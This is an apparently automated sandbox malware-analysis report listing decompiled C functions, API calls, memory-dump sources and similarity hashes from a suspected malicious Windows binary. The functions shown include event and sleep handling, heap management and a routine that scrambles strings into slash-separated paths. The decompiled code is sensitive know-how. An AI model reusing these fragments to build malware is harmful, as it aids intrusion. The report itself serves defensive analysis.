0x001d8d23

APIs

Part of subcall function 001D64A0: lstrlen.KERNEL32(001D5D90,00000000,00000000,00000027,00000005,00000000,00000000,001D41C3,74666F53,00000000,001D5D90,001DD00C,?,001D5D90), ref: 001D64D6
Part of subcall function 001D64A0: lstrcpy.KERNEL32(00000000,00000000), ref: 001D64FA
Part of subcall function 001D64A0: lstrcat.KERNEL32(00000000,00000000), ref: 001D6502

CreateEventA.KERNEL32(001DD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,001D86E3,?,00000001,?), ref: 001D8CCF

Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606

WaitForSingleObject.KERNEL32(00000000,00004E20,001D86E3,00000000,00000000,?,00000000,?,001D86E3,?,00000001,?,?,?,?,001D858E), ref: 001D8D2F
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,001D86E3,?,00000001,?), ref: 001D8D5D
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,001D86E3,?,00000001,?,?,?,?,001D858E), ref: 001D8D75

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 880686b31428c9c02e4d57e2bcce2fbf9798151f42e644864b678e610cfae125
Instruction ID: 0459c6f1f5b2bcaf1349cb219f87af2d437c654eae2f5cc5c5a743f2426b4f37
Opcode Fuzzy Hash: 880686b31428c9c02e4d57e2bcce2fbf9798151f42e644864b678e610cfae125
Instruction Fuzzy Hash: 8D21FC32502B51ABCB316BEC9C84A6B739AFFA4B51B160A17F956D73D0DF30CC418690

Uniqueness

Uniqueness Score: -1.00%

Function 001D5053, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E001D5053(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x1dd140; // 0x1dad31
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E001D7E20(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E001DA5FA(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E001D66BA( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x001d5053
0x001d5053
0x001d505d
0x001d5063
0x001d5066
0x001d506a
0x001d5070
0x001d5075
0x001d508e
0x001d5091
0x001d5095
0x001d5099
0x001d509a
0x001d509f
0x001d50a2
0x001d50a9
0x001d50b0
0x001d5103
0x001d5109
0x001d510f
0x001d514a
0x001d5150
0x00000000
0x00000000
0x00000000
0x001d510f
0x001d50b6
0x00000000
0x001d50bd
0x001d50cb
0x001d50ce
0x001d50d1
0x001d50dd
0x001d50e1
0x001d5143
0x001d50e3
0x001d50e6
0x001d50ea
0x001d50eb
0x001d50ec
0x001d50ee
0x001d50f5
0x001d5133
0x001d513e
0x001d50f7
0x001d50fa
0x001d50fe
0x001d50fe
0x001d50f5
0x00000000
0x001d50e1
0x001d50b6
0x001d507a
0x001d5080
0x001d5083
0x001d5088
0x00000000
0x00000000
0x00000000
0x001d5118
0x001d5120
0x001d5125
0x001d5128
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 001D506A
SetEvent.KERNEL32(?), ref: 001D507A
GetLastError.KERNEL32 ref: 001D5103

Part of subcall function 001D66BA: WaitForMultipleObjects.KERNEL32(00000002,001DAA28,00000000,001DAA28,?,?,?,001DAA28,0000EA60), ref: 001D66D5

Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606

GetLastError.KERNEL32(00000000), ref: 001D5138

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 7009fe1be2d731589c6c684809eeb930fe8a3c3eb7bb3f89f2ff9473fa28146b
Instruction ID: 15f2e5af45c1de346787d8bca6a1945fc08e59deb7dfd6b535baaf5fbb1794b4
Opcode Fuzzy Hash: 7009fe1be2d731589c6c684809eeb930fe8a3c3eb7bb3f89f2ff9473fa28146b
Instruction Fuzzy Hash: 103101B5900709EFDB20DFA5CC84A9EBBB9FB18344F10896BE502A2651D770AA49DF50

Uniqueness

Uniqueness Score: -1.00%

Function 001D8634, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E001D8634(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E001DA7FF(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E001D2884(_t23);
						}
					}
					return _t38;
				}
				if(E001DA762(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x1dd2a8, 1, 0,  *0x1dd344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E001D2E7B(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E001D3F60(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E001D8371(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E001D8C8E( &_v32, _t39);
					goto L13;
				}
			}

0x001d8634
0x001d8641
0x001d8647
0x001d8648
0x001d8649
0x001d864a
0x001d864b
0x001d864f
0x001d865b
0x001d865f
0x001d86e7
0x001d86e7
0x001d86ea
0x001d86ec
0x001d86f4
0x001d86f4
0x001d86fa
0x001d86fd
0x001d86fd
0x001d86fa
0x001d8708
0x001d8708
0x001d8672
0x001d8674
0x001d8674
0x001d868b
0x001d868f
0x001d8692
0x001d869d
0x001d86a4
0x001d86a4
0x001d86ad
0x001d86b1
0x001d86bf
0x001d86b3
0x001d86b3
0x001d86b4
0x001d86b5
0x001d86b6
0x001d86b7
0x001d86b8
0x001d86b8
0x001d86c4
0x001d86c7
0x001d86cb
0x001d86cd
0x001d86cd
0x001d86d4
0x00000000
0x001d86d6
0x001d86d6
0x001d86e3
0x00000000
0x001d86e3

APIs

CreateEventA.KERNEL32(001DD2A8,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,001D858E,?,00000001,?), ref: 001D8685
SetEvent.KERNEL32(00000000,?,?,?,001D858E,?,00000001,?,00000002,?,?,001D5DBE,?), ref: 001D8692
Sleep.KERNEL32(00000BB8,?,?,?,001D858E,?,00000001,?,00000002,?,?,001D5DBE,?), ref: 001D869D
CloseHandle.KERNEL32(00000000,?,?,?,001D858E,?,00000001,?,00000002,?,?,001D5DBE,?), ref: 001D86A4

Part of subcall function 001D2E7B: WaitForSingleObject.KERNEL32(00000000,?,?,?,001D86C4,?,001D86C4,?,?,?,?,?,001D86C4,?), ref: 001D2F55

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: eff260a3fb685345dd3bc8f359c2e596c4435a443fc861ecdc5cbd935d7cd945
Instruction ID: a5b6c3646c5a4f98590487ffffb02915c796b4ff37129ec73997b30eb977790b
Opcode Fuzzy Hash: eff260a3fb685345dd3bc8f359c2e596c4435a443fc861ecdc5cbd935d7cd945
Instruction Fuzzy Hash: 59218E77D01219ABCB20BFE488858AEB7BDEB54360B154527FA11A7240DB34DD85CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001D1239, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E001D1239(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E001D7E20(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x001d1245
0x001d1249
0x001d124a
0x001d124b
0x001d124d
0x001d124f
0x001d1252
0x001d1257
0x001d12ee
0x001d12f5
0x001d12f5
0x001d1260
0x001d1267
0x001d1277
0x001d1277
0x001d127d
0x001d127f
0x001d1284
0x001d128d
0x001d1293
0x001d1298
0x001d12a3
0x001d12a7
0x001d12a9
0x001d12aa
0x001d12b3
0x001d12b7
0x001d12c8
0x001d12b9
0x001d12be
0x001d12c3
0x001d12d2
0x001d12d2
0x001d12a7
0x001d12d8
0x001d12de
0x001d12de
0x001d12e7
0x001d12ec
0x001d12ec
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 001D1267
lstrlenW.KERNEL32(?), ref: 001D129D
memcpy.NTDLL(00000000,?,?,?), ref: 001D12BE
SysFreeString.OLEAUT32(?), ref: 001D12D2

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: c93318ca722128aa6d1d084fe95da1777f041f1817c807e4fdab1aaaded9a7b2
Instruction ID: f3c4afdf25598e15ccaf392c62c7879c7b817d0750bf01c4b6293a93bb1737fa
Opcode Fuzzy Hash: c93318ca722128aa6d1d084fe95da1777f041f1817c807e4fdab1aaaded9a7b2
Instruction Fuzzy Hash: 40213D75A0120AFFCB11DFE8C88499EBBB9FF59311B2041AAE901E7310EB31DA40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001D7EBE, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E001D7EBE(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x1dd238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x1dd250; // 0x352d7b0e
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x1dd250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x001d7ec6
0x001d7ec9
0x001d7ecf
0x001d7ee7
0x001d7ee9
0x001d7eee
0x001d7ef0
0x001d7ef3
0x001d7ef5
0x001d7ef8
0x001d7efa
0x001d7efa
0x001d7efc
0x001d7f07
0x001d7f0c
0x001d7f1d
0x001d7f25
0x001d7f2a
0x001d7f2d
0x001d7f30
0x001d7f32
0x001d7f35
0x001d7f38
0x001d7f38
0x001d7f3b
0x001d7f46
0x001d7f4b
0x001d7f55

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001D88D3,00000000,?,?,001D2AF0,?,02FA95B0), ref: 001D7EC9
RtlAllocateHeap.NTDLL(00000000,?), ref: 001D7EE1
memcpy.NTDLL(00000000,?,-00000008,?,?,?,001D88D3,00000000,?,?,001D2AF0,?,02FA95B0), ref: 001D7F25
memcpy.NTDLL(00000001,?,00000001), ref: 001D7F46

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: f8329f205d6ea09723b17daa8acb3ff3b395f0f0373121d142970fb6563698fe
Instruction ID: 09bf9e31933c178b582f0a78fc6ebcea1b1270045629e4688929c5ed69c002a5
Opcode Fuzzy Hash: f8329f205d6ea09723b17daa8acb3ff3b395f0f0373121d142970fb6563698fe
Instruction Fuzzy Hash: 6911E972A01115BFC7208F69DC84D9EBBAEEBD1360B150277F505D76A0E7709E44D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 001D64A0, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E001D64A0(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E001D427C(_t8, _t1);
				_t16 = E001D7E20(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E001D4588(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E001D7E20(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E001DA5FA(_t16);
				}
				return _t18;
			}

0x001d64ab
0x001d64ac
0x001d64af
0x001d64b1
0x001d64bc
0x001d64c0
0x001d64c5
0x001d64c9
0x001d64d1
0x001d64d6
0x001d64de
0x001d64de
0x001d64e7
0x001d64eb
0x001d64f1
0x001d64f4
0x001d64fa
0x001d64fa
0x001d6502
0x001d6502
0x001d6509
0x001d6509
0x001d6514

APIs

Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C

Part of subcall function 001D4588: wsprintfA.USER32 ref: 001D45E4

lstrlen.KERNEL32(001D5D90,00000000,00000000,00000027,00000005,00000000,00000000,001D41C3,74666F53,00000000,001D5D90,001DD00C,?,001D5D90), ref: 001D64D6
lstrcpy.KERNEL32(00000000,00000000), ref: 001D64FA
lstrcat.KERNEL32(00000000,00000000), ref: 001D6502

Strings

Soft, xrefs: 001D64AC, 001D64C5

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: c91ace937de50869c74235846d223f9c4dd57e88b883b87b80417690aa018940
Instruction ID: 2018bcd189771b6f7c70e9398a09d9f57e003fa3db39cf7efb37351f56a2d568
Opcode Fuzzy Hash: c91ace937de50869c74235846d223f9c4dd57e88b883b87b80417690aa018940
Instruction Fuzzy Hash: 2501D636101216BBCB127BA8AC84AAF3B6DEF84385F044423F60556241DB35C981C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 001D8AED, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001D8AED(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x001d8af7
0x001d8afb
0x001d8b10
0x001d8b12
0x001d8b17
0x001d8b1d
0x001d8b1f
0x001d8b24
0x001d8b2f
0x001d8b26
0x001d8b26
0x001d8b26
0x001d8b24
0x001d8b3d

APIs

memset.NTDLL ref: 001D8AFB
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 001D8B10
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 001D8B1D
CloseHandle.KERNEL32(?), ref: 001D8B2F

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 72d3c7d65097fe18b4f0bb6781a4e71c3602a8ec3bb9b4dd076983c7b4f0e734
Instruction ID: ebbb972b887287dd9dbace2479a0b0c540cddd23d8156f2af997ead3b5ae624a
Opcode Fuzzy Hash: 72d3c7d65097fe18b4f0bb6781a4e71c3602a8ec3bb9b4dd076983c7b4f0e734
Instruction Fuzzy Hash: 95F0FEF5105709BFD3106F66DCC4C2BFBACEB95298B114A2FF14682611DA71A8498A60

Uniqueness

Uniqueness Score: -1.00%

Function 6E281585, Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6E28159F

Part of subcall function 6E280234: __FF_MSGBANNER.LIBCMT ref: 6E280257
Part of subcall function 6E280234: __NMSG_WRITE.LIBCMT ref: 6E28025E

std::bad_alloc::bad_alloc.LIBCMT ref: 6E2815C2

Part of subcall function 6E28151B: std::exception::exception.LIBCMT ref: 6E281527

std::bad_exception::bad_exception.LIBCMT ref: 6E2815D6
__CxxThrowException@8.LIBCMT ref: 6E2815E4

Memory Dump Source

Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: Exception@8Throw_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1802512180-0
Opcode ID: 5e226f65ba87d7b52f5ed290a991ac3728be80a806b0ae07e46bc37ccef00f48
Instruction ID: 099dc707f8efcac4cd2bb817f67a3c68b44c7e8c2966bfd7279278625c4e0d37
Opcode Fuzzy Hash: 5e226f65ba87d7b52f5ed290a991ac3728be80a806b0ae07e46bc37ccef00f48
Instruction Fuzzy Hash: F0F0A72980020E6BDF4457E1D8199DF3B7F5F0579DB100816E836560D5DF38AACDC591

Uniqueness

Uniqueness Score: -1.00%

Function 6E283FEC, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6E283FF8

Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317

__getptd.LIBCMT ref: 6E28400F
__amsg_exit.LIBCMT ref: 6E28401D
__lock.LIBCMT ref: 6E28402D

Memory Dump Source

Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: a82135c4922b3cc903e1d4030d8b05763e2ee38c90e61dd6e498e376799424cc
Instruction ID: d56e35e1468af84d36cb9b5a2bd09079da161c53e78bdab47ca22ff819c1b0a5
Opcode Fuzzy Hash: a82135c4922b3cc903e1d4030d8b05763e2ee38c90e61dd6e498e376799424cc
Instruction Fuzzy Hash: 6FF06D36900A1D9BD725ABF58108B8F72AAAF1071DF104909D8509B2D0CBB0AD4ACA91

Uniqueness

Uniqueness Score: -1.00%

Function 001D804C, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E001D804C(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x1dd32c; // 0x2fa95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x1dd32c; // 0x2fa95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x1dd030) {
					HeapFree( *0x1dd238, 0, _t8);
				}
				_t14[1] = E001D6BC0(_v0, _t14);
				_t11 =  *0x1dd32c; // 0x2fa95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x001d804c
0x001d804c
0x001d8055
0x001d8065
0x001d8065
0x001d806a
0x001d806f
0x00000000
0x00000000
0x001d805f
0x001d805f
0x001d8071
0x001d8075
0x001d8087
0x001d8087
0x001d8097
0x001d809a
0x001d809f
0x001d80a3
0x001d80a9

APIs

RtlEnterCriticalSection.NTDLL(02FA9570), ref: 001D8055
Sleep.KERNEL32(0000000A,?,001D5D85), ref: 001D805F
HeapFree.KERNEL32(00000000,00000000,?,001D5D85), ref: 001D8087
RtlLeaveCriticalSection.NTDLL(02FA9570), ref: 001D80A3

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: c1d30ef5d1d7841a20b92fcbc378b9201a707b5f744c24edec6702599af9ce84
Instruction ID: d72d84f38c60e611bcdb4a38da0b47ba46a550a1c8a72a860a13aa49bbef8cb3
Opcode Fuzzy Hash: c1d30ef5d1d7841a20b92fcbc378b9201a707b5f744c24edec6702599af9ce84
Instruction Fuzzy Hash: 9FF0FE74603141EBD7209F78ED89F1677E4AF14740B048917F941D7761CB24E884CB65

Uniqueness

Uniqueness Score: -1.00%

Function 001D469F, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001D469F() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x1dd26c; // 0x23c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x1dd2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x1dd26c; // 0x23c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x1dd238; // 0x2bb0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x001d469f
0x001d46a6
0x001d46f0
0x001d46f2
0x001d46f2
0x001d46aa
0x001d46b0
0x001d46b5
0x001d46b9
0x001d46bf
0x001d46c6
0x00000000
0x00000000
0x001d46c8
0x001d46cd
0x00000000
0x00000000
0x00000000
0x001d46cd
0x001d46cf
0x001d46d7
0x001d46da
0x001d46da
0x001d46e0
0x001d46e7
0x001d46ea
0x001d46ea
0x00000000

APIs

SetEvent.KERNEL32(0000023C,00000001,001D649A), ref: 001D46AA
SleepEx.KERNEL32(00000064,00000001), ref: 001D46B9
CloseHandle.KERNEL32(0000023C), ref: 001D46DA
HeapDestroy.KERNEL32(02BB0000), ref: 001D46EA

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 7dcd35167cc540435a3c0946a34c17dfb4645bcbb7d77fe70f1dbc9fb23728ff
